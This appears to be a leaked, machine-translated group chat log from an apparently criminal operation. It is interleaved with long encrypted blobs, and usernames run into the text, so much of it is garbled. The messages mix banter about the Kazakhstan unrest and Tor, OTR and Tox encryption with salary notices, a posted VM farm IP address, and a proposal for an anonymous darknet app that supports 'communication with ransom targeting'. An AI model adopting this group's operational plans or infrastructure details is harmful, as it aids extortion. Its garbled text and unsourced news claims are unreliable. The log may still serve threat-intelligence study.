channel?eyJhbGciOiJBKBpzK7zwJHoBCiNQh68SXCt9jW52mQaJsGIcyAY/H9/WiKijQAqYNkb+8a1S6LsrEcpm7ybCZrR0oOdxHUh3WVGnHIffWQ2qG7ZQ7T02X3+HTxUfLnu28ZR5RepkLc5IS/cdNNzoEtuzPObnMzvBEw9V1KvNykVNuSdtE+2ACUR25qYn2cyOBYnCAc3WOm8ceyJhbGciOiJButOsPxcbfXv9tZG0tKb+fTqfYfPxasT8SRyXQzS7kPIjHCuZOAZD3vK+k3HP20+8Jj9k6Hq9py+v0CG+GtmkX2ys815tVo1VZehVjrh2fuqMXxfBN+QQY+wtZsMTC8EMxSKQthjVdd8PRsbI8RA3pctderFxJ1JI2ACwzkBoeOMUT22dsK4I2Al0+1ygl+g1tB4nilER/MNjtevL1xfDCgibJCADbMzhUkC9YpMaZtgf7R3plM2NOxFDD5y5MT11YEwnu37bCPKfZPmGklRhZHv12wB0e8zEjTZnMzi1RLZWqU+nnk7ICoMbkqrjSofzgegCM1BMrAr78EvWL3zw32iKplPMgYlBKuuOXz8HFT7sGdbMo9+Bc6EdCRGwHeVwMpxVZuHCVz/T6II6LQbFZWLXavOgqs4EbfvV+6BD4hUsnus8GEEBGPm1GI4JJjO8EKGBHsGMAQ2eDX87nm65bat99AoeXvEXLH3dITXAn1LCsiBRjCtGeE9ZJcCVj4WwdSKl5XZ0vWESRqL76M2xdZjh8PQnIQd/ElYEfC/SqDHnTQ4i/33eaBKUOoQxlCtBxQzQ0HZw/YBm+KoIXSI8JA==eyJhbGciOiJBJh14xutu9Y57OQTMvTO7QIIlFkBBgyryl321hTtICTE5GEFWocU3efq+W3sC5M/i9I8TYdu7aA84+Luw2QFars2LZARVlLZj9Mlx2DkH8cJa35rtyuHKzuaoEl9mizeWJNxGxWOek5U6sT+yu1KmfzFzoezku0n5aHpFTEFYAO0=да, I love everyone in the world, this is my homeland!I love live cats ))) ok don't get wound up, I love live ones ):laughing:I'll go watch russia24 and see if it's sad.It's not that bad, of course they die in the process. i like cats :heart_eyes_cat:you're mean. come back anyway)) start pamping i'll come later ))))) i'll come down and rip tails off) angie, don't touch cats ears)) i just didn't want to write "in heaven" here. it would have sounded too much. ♪ innocent:64k go ♪ ♪ you're up there in your clouds, you're no match for the death cats ♪
(*you're up there in your clouds, what's the point of mortal cats? (*you're up there in your clouds, what's the point of mortal cats?) Watch the cat60 in the morning (pampire beats, beats, beats))) In Praise of Salary!) And the eyes of those who were asleep shuddered, and the beats of the cats who were dozing rustled...Hello, everyone! who is not asleep - send kosha in person :) thanks. it's me tor gobitDa all seems to work, push I can not check, because there is nothing to fluff@all git at all робитом?eyJhbGciOiJB4fWSV35UHC6aaJrresI8as+S5cV0ml4l2e6p1243gYPA0jTQZwH5lWoqqexVMVSaIGV9BR3bZ8nRBTqmmC639UPIYu2Q9rlF2uhI6W8BSc1lzxlcPHPKH6SNHDh48z0GVEeW5hDhkqLa8IC8BIPBr1f7pEuzhaDsy/wKTKbMapEtm6GHJgTLKKv98Cka+v/UeyJhbGciOiJB4wr+YK3KB5EZRVleDjM1FlP+sFx0J4XOz8/oDxs2133efLIJRQ6UUXDKTuH2ITvyHtejPyDbjC7GlI14hMb3woBxyYYTawhZOJl24C8rIxkefzu497QulRHtE8sLcTxjF8FpHSRimpFb9ZHQQYtwxYOYi4iMcOh4Jp43pXyKjDSf1QnYY2XSKIUIQEQSYWCpWoA6lsrOy2rTb48Ykga/e7rWF2KHSAF+3YtGDTrrWC2xLQEjwtX94N0GjddpZyX0CJ1OWfhwi/bJ2C5RnfruBXzM+8mNo6cld8f5c95scETyPibwj3xwhaB9Ttw692VNy1dosSuPda/jYzeRl9BDmjoZZIKL4AcpzJkLVBggzOublWCcBxQK/FCw7RUkak/p/w3p/deyI0A0kfpM30xBAZaIsteaDzDPQzrSi/Ug83HbvajJ8kzhtPeAw1WJa9DrMbqmMLklWImijDkvNV6t/AnUz4bJwekD/NyQfROF+z5xsiNlpgWdiU0bHPD9Fevl/ska3agET8e3ICP9TpobYHy9KetBwEZriOoK9Mx+sra92N8zPh+AZwZS6Ua1Vn9C1t9MvVS4I3rNV9Zffbaf5vD49XEQPhR4ebd3CTIPE5zoy8GoT55jQ0zUOCcTXs613ZHELDLHQtpnbS2QMcO4VA==eyJhbGciOiJB6u1JB1vDAallFgO9vY6v8sq4UAw85SoZofsULHGwSfaHJ2iW2W21GA5KaZu/gjLH13QCccoD5ErSD3pdCBQ+2tHengpsSnT2wF/BuByP46G53jJ0eLuyqq/XRcagnib4mUNc not run over) Oh Hammer working hard) overpowered me!eyJhbGciOiJBAIBFy5hsX5tr3Kw0EfbxNmQxBioC1GWu0/gpG+jUenMafKUES1AZERUOnsastkaz44eOLmqsV81iix7Pp8sx89/styy3TAXh+5elON7iqosobUfh8fw+i+z53RFZswqGZtmPODNuVZFaGZF2sXYg8JW9DaT1gRK1WUzdsLTlYjGaMN6xm6cZhiSadV0PzIyeeyJhbGciOiJBvVul0hnH2M77Xih+X4vBh+wf5n8E+V9QjLYW2JgtjZzGKKU9kwQ3dDIVUXrgB2erjVAkpMVjH0KgB3UEWya9WfRlWtMQeSqmDdWNz/lXgZ9RAZiO7Qtj11CqyMfasSrc3kZ67L4L+edHEXOzGpqfOBMDlydEdMDk1lHcdv8jU1B0pru8qH13OGrczr3kTxhdN5pMVYSUANcDEodsTTTTvCLjLJWZPPKf8RAyscIKqzunZHASIt4HKX4F5dtmUZokj3/rXSqwOqW1AbL6Ylcg3vrZQD4QTny0EJiTNvSWE7VOsSO7atSAvvqN2+skHFGVJg5wOPh2Qjor1Mt+ltdzL8vE422Yi/cR+4zNoa6q3Qv7e6oUXAtWDoc2XFLZ6vlsm0xWJC5GymVQNJ7BX+7fCxwAUuiYPN4612rCox4MNvElP0kRciiEaMVVTh3BCzZFC1va/8GSD8OJ1K8B7coDBCLNwQhlpTF2YgussPfAXF5+XjycufTFK7H31h9GsTIu1XDrMiRDS/R7/H+Vi3LNwIlVZ2GC8DcAGDuSeiIGy3OLyGu3bLK/VoFBWuV7jg4hrsD6kwZXjnMf+GD+bF7sSSAkFMBdoEqA21XryMYHRtLIP1561sKOQhqCNnDH8UVoBCTfaiwpLEI+snMqY7aebTrAVms1DrsK5wb1B4O+pz9YQGjse3LcOlE6sfCgXvI5Iuw9hRxXXi/0k00fBULYgHHeBRBoYqUhozA1BChF9Ys0mlC+IOAP1vt++yk7VnUv6xu5vVDMvyeyZGjFF5J38bs1O1FYbNkuDtv0+d2v at home of course !I don't need sticks, I'll throw them myself and drink water, if he doesn't come out, let him throw the ball :soccer:He said he'll start at 10.hello, when will Silver come out?
Happy New Year to all who are celebrating! I'll take it from the balcony, make some dice and give it a Happy New Year) although you can eat vodka/cognac... to drink or not to drink... that's the question... well, stupid))) so you have to answer your foreign colleagues to the question "will you celebrate this incomprehensible holiday?" and what is * yes, no probably? yes, no or probably??? no probably for Stalin? they just have a failure of the matrix I wonder how our foreign colleagues perceive *the old new year *?? like *back to the future *??) well, what? meat is never :rolling_eyes:in a place with worms? as is usual, before the first flies ate!? @angelo Misery... and you finished the olivier??? :heart_eyes_cat::)they say you do not booze, booze again by the way, Happy Old New Year to all:partying_face:eyJhbGciOiJB1KLkLer12IF7lZLPafYA7VTiA6mL0yo1azk+siwjik55KXLyWQryLFuNURCLjUF3My9WsG9f+L4kwawss2hM0pcvEat6F2ekQ8qwWi/33gN49k89/owX4Vi6Y9WCAUqqLz04NRt6UKmw536CEoNfMb7gWqNIj1RyETZ6QhJzTo7/ICBFEGAiltmH+D0zOD2+eyJhbGciOiJBQAwLC6tK34m05B+0lt0jTd3YjWaajtv/2S53XSuwUCXp1fCESIqqetGAavo54JGrACqgnBWquXn/hqzGDggzFxLk9QQayNmifE8Fb6YmF6VU0XIxvTV3I+FUi0lX4+BgOAVjY23tUk2ak5TQa9DzcMJaE08UT892eR/QoarXxA/TJhzQ/AjUOVFWjCyq3Y8POkVYNOFIJTBUqzouXctaVcIVlgAwyK1rvYVTZ3SgMcwOKjonDq6hKOP98gs5JlOxPwC2qyfPQMb/DnW1gwTVJpbtVOlXr8Oxe67oogMCflH1CwcnYC6LCA2VPi+AN1Sheo1FizdELetifECd3dszrfruug22BzW1SSjHLqTWYfQJIuAv6A9rsHAX4a2WqwROG+BpMdSlK71hxmPQInr+0ddDZQxnodIJ07ooLIJfy3+/8jKa8IzSfGIMHMdL17LvsTt+coLUihCDCxgHZbCGlxkDCs44RCNs1S1vl/WHUPkOdulRqOXS7F1/vIQmMyHDbuSKVbfhserpR6DZuBfrT1dwr1Eh/dZh3dlYjVVRgNbrZkWvCsoH/4L8FKoQvYo1vO/uBDBmfLZKWEdzVVjfqQ==eyJhbGciOiJB1e6eIQros8t78/NFra+pE9K2SlvF2T5Bw5TfvyY+knF3QFra2v6m31LuJEyFLl7hV42NbJIPWaiXk3xdmY5IrL6RUiiojEedCBfSpwBYF4Kc/uhdMa66aWSjFi3DwVOZ6mLHfhrvAOQjpANQ5p//XCEFXrSu9EjvNTqcN9xTz3g=:innocent:It's OK there, don't forget about your thigh and Mashka, don't forget to finish your wine in the cradle and go to bed.
https://coub.com/view/2c506b
``somebody's got cohibas for every occasion.``
https://coub.com/view/2c6khb
``And it's not there, it's there!`` That's it, my purpose in life has just gone to the cunts. Even Serguei, the Tuvinian, is just an army general. In history there was only one marshal of the Russian Federation who could not be one. That's it, I will not be a marshal - All Vodenka. There are no marshals in the navy. there's already clear the fuck is clear all the cocks marshal fleeta who's above admiral is clear the fuck ? dunno why i'm interested in this at 2 ama admiral is clear the fuck is not even kopetan obviousness the main hole how to earn on this by making project with open source)@benny yes@someone else git? the purpose of discussion - find holes in the concept, improve and add.
Maybe prove (un)viability.
4thJL2KJv4akuNm8FQ
https://qaz.im/load/5SN9FT/F6EasF
``The essence of it comes down to making an app that seamlessly integrates the things you need for the darknet economy:
- normal chat, with file and media transfer, with offline messaging, with channels on which you can do a lot - task management (like we have, for example), paid subscriptions to channels with important info, communication with ransom targeting, and other stuff
- with integrated money
- which have all the features of untraceability and anonymity, based on onion routing and cryptography.
 422
The change you requested was rejected.
``RTCooooo help us so we can help you`` telemetry is for your own security! (s)Or wrap it up with a proxy, watch/log connects and data volumes.So what's there to guess about?) Take the browser and limit its traffic, allowing only the required nodes, surf for a while, then watch its activity on other nodes, it will be clear whether it sends something somewhere or not (I mean, whether it tries)I did not expect another answer, it is clear that the mass market can not be private a prioriI use ita couple of months ago saw the news that Brave leaks everythingA.on exposure?[ ](https://xflemdsxjrjilw34dsxpvrxp5whnaut7hc5xejwuqs6eqrkt77bxkwid.onion/channel/general?msg=uRCgoCjPhRWG68n9f) Are there any links to it? but touted to be, like, super-private As far as I heard, it's the same spy browser as ChromeGit again 422The CSTO Collective Security Council, in accordance with Article 4 of the Collective Security Treaty, decided to send CSTO collective peacekeeping forces to the Republic of Kazakhstan for a limited period in order to stabilize and normalize the situation in that country, said Nikol Pashinyan.https://siasky.net/AAAEwihO5yDHhVEOYB2gBfsGiLgUTxbyo8KGtTO04dtRGQ (!) even after the rise it is the lowest price in the world (it is from panorama))) but the price in ru is higher anyway it was panorama) fuck, I must go to bed, what news from what site?And what's the surname of Andrew, check it out and let's do something on the sly)Otherwise the holidays will come to a screeching haltDon't drink too much) What a sad fucking situation, nothing to say :sweat_smile:Like russia supplies Russia 2 and this is normalI like it better General Director of russian company "Gazprom - Kazakhstan" Andrei Skomorokh admitted the mistake of unjustifiably raising gas prices in Kazakhstan. The head of the company put the blame on the economist, who used depreciation factors for Russia when forming the price of gas in the republic.

"A specialist at our head office in St. Petersburg mixed up the multiplier and calculated the price incorrectly. In Russia, we raise gas prices up to 50% every year. With us, price increases usually do not lead to such serious consequences. People just pay and drive in silence. It is very unfortunate that such an unfortunate situation has arisen because of such a misunderstanding. We hope that soon the market will stabilize and people will get used to the new reality. Once again, we apologize to all the people of Kazakhstan and wish them a merry Christmas," said the company's CEO.

Skomorokh added that the price of gas in Kazakhstan is not possible to lower because of the approved budget for 2022. According to him, the revenue side of the company is not subject to change under any circumstances, and it will be possible to revise it only in December of this year.They have financiers who think how to save their wealth, they rob everything and everywhere... If the price of gas is a penny, having a good generator that runs on gas, you can fuckin' multiply this gas with asics or something like that, as an option there is looting and sterling going on! Everything is adult December 29, 2021 Miners forced Kazakhstan to think about building a nuclear power plant
Kazakh authorities stated they need to build a nuclear power plant because of miners

Due to the onset of energy shortages in Kazakhstan authorities have begun to discuss the creation of nuclear power generation in the country. This was announced December 28 Minister of Energy of the republic Magzum Mirzagaliyev, his words reported "Vedomosti". not immediately, of course, but over time. such may be their cunning plan? such a thought flashed, in short))) It's about the U.S., of course, in a way ... in the U.S. ?))) and nah 50 + % of the world's miningKZ they will already remember the "risk zone", you need the next redistribution of capacityInterestingly, and where the Chinese next try to find an "island of freedom" for this activity? assuming that the instability will only increase aaa) coincidence? i don't think they need a global shutdown, you know what the chinese miners have done to them?they need the internet, you know, the miners from china and the miners from belarus...) well, fuck, they went to the shop ahaha, there are such things as miners have come to them, yes, he is closer to them than to Belarusians... just wait until they get to tsoi I liked Belarusians more, they felt more relatives to tsoi, like in 91m... I fucking watch the video video, they expect bullets and burning cars like meteorologists? the internet is promised in some places, it feels like 3g) and so the stock exchanges have already gone down3G is working, there is an internet in some placesNow it's like everything will go down thereTo say they are sitting there without internet at all?Tell me about it, I used to kill with love in my eyes in Postal 2 )When you can put a cat on a gun and it will be silenced with a soulAnd the cool stuff they used to doDoom 2 ignited the spirit of bloodthirstiness in us !Postal 2 overplayed it all because of playing what IT people are bloodthirstyNow special operations are starting, with open fire on the terrorists, as Tocaev says. It seems to me that besides executions there is no way to change the government, rallies are a joke, that is why I did not read the chat room, and maybe I was there as a bogeyman, comrade major. But it seems to be unsuccessful So what happened? Live Kazakhstan, Tokayev is asking for help from the neighbors. I wonder who will be the first to bring in troops. They scratched our heads and thought, why should people have so much fun on New Year's Eve?
What about gas? > have NATO bases started to be built in the KZ?
> Let's pray for democracy, the bases will be built later. Have you wished America a prosperous New Year?Tokayev dismissed Nazarbayev as chairman of the National Security Council. Russia is a generous soul) Russia will take fugitive prime ministers and presidents.
We are sure that our Kazakh friends can solve their internal problems on their own.

Kremlin
```
:sunglasses:Protesters began attacking gun stores. Kazakhtelecom cut off the Internet all over the country.How did you summarize the speech )Happy Holidays to everyone, are you alive and well? There was an attack on the Korgan gun store in Alma-Ata. It was looted. The police did not come.AHAHAHAHAHAHAHAHAHAHAH)) I can just imagine a new TV "show": "Only they won't be able to gather public capital (fuck that, they will be the fastest ones to change their ways and sing what they need), Usually, the loudest ones yell patriotism when someone who has the most money in the West is the one who likes to blame the West, and then they themselves go to the West with money.```
At the same time a governmental business jet flew from Kazakhstan to Russia. It is not known who is on it. According to some reports, about 10 private flights left the country for Europe in the last 24 hours.
``In gta gbo was not there, what is the reason for gbo``.
What is going on in Kazakhstan reminds more and more of GTA
Bazarbai warms up the helicopter, they fire live ammunition, we can hardly carry Belarus on our shoulders.
The situation in Kazakhstan is heating up to the limit. Protesters began to take the military prisoners.

The administration building was set on fire in Almaty. The maddened people forcibly take the weapons from the security forces, and the security forces moved to the side of the protesters.
A brief outline of the situation in Kazakhstan:

1. In Kazakhstan, they are silent about it, but in fact the most important personnel decision was the dismissal of Nazarbayev's nephew from the post of first deputy head of the National Security Committee. Abish Samat supervised shadow jamaats, criminal gangs and other marginal foam that are now taking part in the coup d'état. It is not clear whether Samat's ears are sticking out behind the current unrest, but that he has something to do with it is indisputable;

2. Unexpectedly for many, the seemingly monolithic system of Kazakhstan cracked, as evidenced by the resignation of the Cabinet and the inarticulate actions of the security forces;

3. Apparently the Soros grid and the State Department have nothing to do with what is going on; the current revolt is quite in the spirit of domestic political traditions. But this does not mean that Western partners will not intercept the protest. This is eloquently demonstrated by Oblyazov's puffed-up cheeks and the grant media's attempt to cover the protests while silencing the looting and violence;

4. Ethnic cleansing is not being deliberately whipped up, but the problem is clearly visible on the horizon. And if now the calls to persecute the Russians sound sluggish and in the background, in the case of an aggravated situation, the pogrom of the Russians (like the Uighurs) can become a kind of steamroller, an entertainment - in any unclear situation, smash the outsiders;

5. Will Russia take Northern Kazakhstan under its wing? NO, under no circumstances. This is a nightmare of the Russian leadership. Unless there is a scenario of total war all against all with a total loss of statehood.
The police is taking the side of the Nazi-Maidanists. I'll go and buy horses, the price of horses will go up soon)) Play the Kazakh hilarious Capture of akimats and arson of buildings is the work of the KNB, creating a picture that protesters are terrorists, etc. To have an excuse to respond with forcePatrick said sarcastically, well, nothing unusual, of course, if yes, then it's okay, if no, then something is lateRussia is to blame, as usual?The president's residence is surrounded, the akimats were stormed, riot specialists joined in, like in Armenia or Georgia. They said they were jamming the Internet and communications... The same methodology has long been obvious, Ablyazov is a Russophobe and natophile, he did it.Who does not jump (on horseback)-the Moskalpo country code from the ad, or what? Patrick, so there are already involved Ukrainians? Go figure, what if not the clan, for which they rocked dorzhil or what in vain went, since here, let's do something. what to bombard?...he also has a brother, Commissar Rex, no?))he was in the filmrMukhta, I know him, everything is divided between us and western companies.They have been talking about russian occupiers for a long time.They are the occupiers, they didn't build it, Why didn't they bother to build anything since Soviet times? There's nowhere else to get it from there, they bring it to Orenburg from Kazakhstan and Gazprom has no liquefaction plants, so what's Gazprom got to do with it?) They produce it themselves and Gazprom can also be added to the list, Tokayev resigned, Tokayev accepted it, so what's there to look for? They say that initially they were complaining about a gas price hike, and the government met them halfway, promising to lower it, but they sensed that they were too quick to agree and started raising new conditions, and that's when the government decided to give them a boo-boo * again?The fun continues like thisNow on yad in just appeared the newsProtestors in Alma-Ata burst into the city administration building. The protesters are armed with rebar, sticks and shieldsdumay similarly, the negativity came out, it felt better and we should go on living again They got a beating yesterday and dispersed, until the next disco they don't have so much fervor it's not the Kyrgyz they have a day off todayda I think there will be nothing for them now we will watch and see what happens we will not de-anonate but okay or are you from kazakhstan?When Gurbanguly goes there, Rostov will shine in golden statues), Putin does not leave his family behind. It was thought his family has over 100 billion dollars, Nasharbay has something, his family took everything and sent it to the Nazarbayev family to be dispossessed of all assets.In Kazakhstan it is very good, but only for Kazakhs, there is apartheid, ethnic cleansing, and monuments to the founder of the Turkestan legion. You can always compare that Turkmenistan is the worst, but you cannot go far with this logicThe French are steppe) compared to the Russian Federation.fuel is cheaper, and many products are the same, or should we just rename Nursultan to Astana, I think there are a lot of complaints. Is it because of the price of liquefied natural gas? @esteban to throw stale olivier in my face, has anyone written to me here?eyJhbGciOiJBEbSDQaWef41rOquIXFNETOqIGd9Bcif37sW/nsmHJp0Gc7ZcP0/kP24hwog4Jb6Lf7ytYU/mz+8jTk+b3MSmwDQoEpEQbvZlu6Y8cTxwNF498d61u5oAJ0R+up0TM48vEERDe6aZSrZdgq52ualTrU8TT1HlrQJmv+13I8j/RS/jC6rYW4SzEIrp+TpUtLMlxz6Sl2jMpqhV1yJmT1LMAQ==eyJhbGciOiJB+aG8yYeuxqTQOmWZ3HGPibDFYMJJEsdy1s5ftpdz1GQiiFYrksOsRY2xfrofNGSCf7+UFEk/CO/b3WPdWnXkjZlPDLZQ5vBfSP4AOAWSduZshfCBFGs59ZKsELDsfArTNgWqrL+Pp15yfls39qXybXsT4tKMvHBUjb1ReBp7ub0xpuiy7jgTyQquodrAyf/IeyJhbGciOiJBuSssSAWURj3CRPdwfB4W93Lwdk3rLQQO7JG3IXA7Xu1m7gr2Ax/aJw11qH1I2iA5HIVbYMW6mP1F0os6xZUCa2fML70wchQbjgboVMoMBJFF8d9PAEqnp1Nuk4Gy1R9Pqcw1SgygD0znkan3cJq1/eMT58+6cFA5JqCAAlh9FfM=eyJhbGciOiJBZYWNUUknz6j+w6HzR68MvpOXjKpD1XLhMJ0hmnwKFWPqoF5LcmMS03+5KqRFFSpf+IKZedoKSqzZIlKCVm9VlXuDBzw8hgBKbbDel5xTh9bV8emrRA3iHtyQteT0nZuSucQCEjg4332gfSC3RFxBWYev4wvMOoVRqt4B09/l2OTEE8dQ5DjxFCz3gFA8IBPxyWVcut/Vc/C0hspqaNMIgobiIAdSM/ACtqvofLpUVzw=eyJhbGciOiJB9NuF7h3Dp/L+Cd8W5uSt/Q54l56LLj8v3/JJwChoKzWftW2pMOoAERI9xt3EE60tc5XzKX2Hvm8K6EyQWn6dAO1grmStCSm1lg5m4FZbcuEruS7Rv/9a57WzjU96pzBd19D9vdx9iAHjzO/kxTHP fordcast - it's kind of like a radio encryption, like they are transmitted to everyone, but you never know who is going to get it.If the P2P connection is established, then it's a shoak, stolen IP address of the interlocutor through wireshark or the same on the ISP side can be done.Thanks are there guys have a Google account? I do not have a description of the protocol was not enoughfits on this, I am interested only in the cryptographic reliability and reliability of implementation
and who ran away to whereguan@ryan include apr in pm> and what's wrong with tox? the only downside is it doesn't work offline
The project founder ran away with the money he had invested@stanton don't reinvent the wheel )Identification by nickname - RSA public key -> nickname inside the client. Just like pgp does - it looks through all installed keys:sunglasses:The messages you could not decrypt, just ignore them. No recipient's address.@thomas oh, coolWhy carry everything around. You can do this - there is a pool of second level addresses on the torus, they forward the msg stream up, then it fordcasts them all, you can. IP anonymization is solved by a ready-made torus, and protection against reading - PGP (RSA)here by the wayhttp://toktok.ltd/spec.htmlhttps://toktok.ltd/documents.html well kinda described here high level I can not imagine how it is possible to write it without dokitam combo of onion routing, p2p-network with dht, spiritual successor of OTRtox protocol is more complicated than torusNow torus is closed partially)on class flair )on intuitionnapish torus without dokida of course )only sorts and all can it was not so what the doc was deleted?If the documentation was there, why was it removed? How do you write a project at this level without documentation? Why is there no documentation for an open source project with a very complex cryptostack? There is as much code as you want, as much code as you want. And there's no documentation. Look - there's a general flow of messages, everyone gets absolutely everything. What he was able to decipher, that's what's shown.So he's an opensource and his group chats only work if one of the people online but there's no proof of that.I know he's fucking great, everyone says so because I don't know his protocol.Why is tox bad? the only downside is it doesn't work offline it's possible via tor but you won't find it if you find it, i'll look into it and we'll switch to tox find me documentation on the tox protocol like pgp cata can i write a mobile app? You only see messages whose RSA public key is installed. And all you do is wander the desert for some reason. And you could have seen assault ships on fire at the approach to Orion and watched the C-rays flicker in the darkness near the Tannhäuser Gate.I don't like chat rooms, can I make a corporate forum? And then Turtle suggests that you mark all the pictures with traffic lights or you won't get past them. But there are no pictures. You're completely clueless, and you realize that the vile creature has been overturned for good.Survival of the strongestNu then you can and turtle dig, pansyrem)It is necessary to call the ancient Ukoh - the sea digging)well, that and food and drink :sweat_smile:pischolasda, otr tightly includeda least one was: either e2e all without problems, or OTR with autoconnectiona very difficult to work in the new version of Rocket, e2e half does not work, with OTR tortureWelcome all!now i already think that the robot your actions it can not turn over on its owncopy of clever words then to the obedient imagine that you are walking through the desert, and you see an inverted turtle voda-campha ) to empathytest turing passed typical excuse robot)) i have a kinsmenet, i am not a robot, i am a person ziggygunsmartin i am not a robot, i'm a terminator)adamAnglicans there do National Cyber Force with a headquartersYou're a robot, confess what else will be asked to do in the near futurefuck captcha, touch mouse that can't get cheese)))@all Please also email me if you have VMs on your farm but they are out of work and can be removed.+@all IP of the VM farm:
```162.244.80.105```
All who work on the VM - waiting for feedback on the work of the wheels
Do not hesitate to write immediately in person. If any brakes, bugs.
If you have e2e enabled and want OTR, then you need to turn off e2e and turn on OTR
Because e2e + OTR = trouble ))At this point - as elroy wrote
I'm looking at the settings where you can turn off the standard soundsYes. I'm also very grateful to @elroy) spskotory distractingk by the way I turned off in the notification settings, it is in each channel shouldThe right at the top 3 points, Notification preferences + completely agree with basilThe question. Now if someone writes in general constantly beep here is this. And it is not clear, you write it or in the general chat. Maybe you should turn it off. Constantly distracted to check . To you or not to you: in the new version of rocketchat only this ability to communicate OTR.
UserA sends a request to OTR (key exchange). UserB receives the request, exchanges keys. Keys are the same about OTR, yes, some kind of inconvenient thing, you have to wait for confirmation, in the settings there is nothing on this e2e should not distract Demetrious while please enable chat)) Gentlemen, chat on the new version of rocketchat)
All will configureDa and e2e was comfortable, too ... very uncomfortable to work so is it still possible to return the automatic connection OTR? We generally stupid to have a choice with it or without it well notch OTR such a false api that there is no button to make it always onnu yes, you start otr - the interlocutor request to start the conversation should pop up on the idea that the interlocutor confirmed the start of the conversation and turn on OTR - hmm ... That is, to knock and break into someone openly, until he pays attention to you. and then both turn on OTR. right? Thank younadoado that the interlocutor confirmed the start of the conversation and turn on OTR, for now in this mode, if nothing has changed since yesterdayAnyone works OTR? basilpriy @blakey go away for a while, soon will not come in again glitched@ruby higrempriyThere just appeared the second.... It wasn't there before I posted... I closed the first one. It's OK now.If anyone has a second "general" channel (with an unread message), do a "Hide" on it.It must be the second general (do you have two?)And why doesn't my general reset that I've already read the messages all? In addition, when you click on the menu "Mark read" on the general, I pop up a message "Not allowed"??? allennickblake@all Hello All! Who yesterday could not get to me and get the WP - write in person! thank you, everything has appeared))) @all The farm VM will not work. Techrabotka an hour and a half now the general just disappeared :Dwildganeshmitzi just the sound of messages now the same thing with the working channel can it sound from the general?If someone has a second channel "general" (with unread messages), make it "Hide".everyone has two main chats and constantly hangs notification that there are unread messages?biggiethomasodischadelroyvottwo days, neighbor svehehu thrown out, I hope I will not blame that this is a glitch with a hide, it's a glitch in the base I now have two general chatsrubybrookspingweldon thank you tomorrow wrotenight sleep tomorrow means I have no responsefrancesa I do not give zp I keep you informed r guysPornohub writes that they have not fallen asleep, I do not need your access, I do not need your cards, play blackjack and whores, he certainly does not mind))) just the board?dmit only you do not give me access to the board, even if I really beg to raise blackjack and whores at last) go to the board raised!) krasava) @carrol check out to test the load on the chat))) @manuel well finally! )manuelorval by the way, and what locker got in the UA? eh, what kind of press, do not even make screenshots forum lookmahaha on some forum, write a seller pliz) oh, Facebook lost a base of 1.5 billion people - and where sell?no, you can open it, but it's complicated and expensive, sometimes it's fun a lot of people who do accounting on google accounts in tables i tried to fuck off once, google went straight to the defense and started yelling into the phone though google is not so easy to open this shit, let them open google a couple times they tried to open me often, it was interesting, first time i ever fucked with hackers):sweat_smile:Fucking hackers!the fucking hacker went, the mail was returned, and the exchanges have long been dead, let him have fun)akamis exchanges is normal? in my phone 17 messages "password has changed "Fuck me too, I had a Saturday at 5 am stolen mail and all the shares exchanges) I at 11 am as started receiving mail and surprise) oh, facebook lost their base at 1.I was 11 in the morning when I started getting emails and amazed) facebook lost its base of 1. 5 billion peoplexxZ It was all zelensky, he went there asking for something in california have they switched off?Poor trackers now run around and do not know where to look for treasure (google and amazon services are also lame) I thank them for their quick response and action) Just kidding) We will do it@Garfield Your appeal is very important for us.+@carrol accepted But still, about the channel announcemet, someone responsible for the organization of processes, tell the management this proposal, it would be convenient for all!!! I pressed and the other contact's otp also activated, as it was in the previous version@demetrius can you return the autoreactivation otp? without waiting for confirmation from the interlocutor?but don't sleep, this is a mistake, it's as old as myoni should be pleasing to the eyes without women, it's fucked up to work in the real world. in all the history of my work experience, not once has there been a team with at least one girl protests, I have not touched, I do not knowAngelo, you know who the brunette here?i recently watched Hottabych - it all started with the phrase "i wonder, are there girls among us?" we are team building today - blow on a brunette :smile:every morning to get out automatically for the integrity of the team) would order a shuhet then i do care about the integrity of the team))
i'll fire you if you don't do something
```
the exact phrase for all)or there will fire if something is not done )))) I can not then we'll be here and the important messages will go and sit and wait holy shit so myselfvot herefor example, the message - who has not received the salary is not lost in the stream of reason )) so it was conceived yet jeremya there pure ad-hoc but in general is just a bunch of thingsEt is a sensible idea. Say, dear, why is the channel announcemet not used as a notice board, it would be logical and convenient, clean announcements without unnecessaryOf this, or from another perspective, Dim? it's not a bug, and fichanu then normi tsap webu all and everyone hangs with an icon all second gengal ?it is necessary to heat the laptop screen on a candle to appear a message?)who killed insta and facebook? we need the load on the chat, let's spamkolyan writes invisible ink, as Leninya passed the test ! where my win 5K zelenii ?:upside_down:test passed as I missed the chat !angelo all resethe again on the fly chetotochili?) stuffychetto not working right awaya no, there is, but the sound was before nastylucky you)) and I have no soundsada interfere can turn it off? and also the sound of new messages are on the generalFrants there still alive, do not know?) yes I think nesk times it zeroed, but certainly not every query yes, this is the problem of TOR
It was necessary either to reset the identity, or wait for "half an hour") no, you do not understand. I have not opened the site at all, and then bloop - available. I went in, and there's half an hour as discuss@elliott that's the thing, you were not in the chat, that's the message and were not updated for youvot that inconvenient kapetz, I remember it was always interesting, how is it that you join the chat, which a minute ago was not available, and there is a full channel for discussion of the new version? It's like a dns? I understand what collin means - the interlocutor has to confirm the apr can still be auto as before? all the settings and the inscription timeoutno I click on, and in response modalka from crsticom now even need to confirm the other party yes, I had to turn it on myself it was manual, it was e2e turned on automatically when the conversation begana bad e2e is gone in general how?with a manual confirmation of the manual staletr does not turn on, it says, the timeout is the main thing that works. e2e in previous versions always glitchy2e need to see e2e works fine, but about OTR and e2e?i've seen it since november 20 today)) since old versions, the second general has been stuck in the database with a new version of rocket) *general and generak second with a message unread) OTR also does not work pass from e2e now does not ask when logging in repeatedly so?Garfield@all write in person who did not get zpfrances all are also slow when scrolling?lonpriemesteban:infinity:carroltest2collinpingrocco@all write somethingsomething 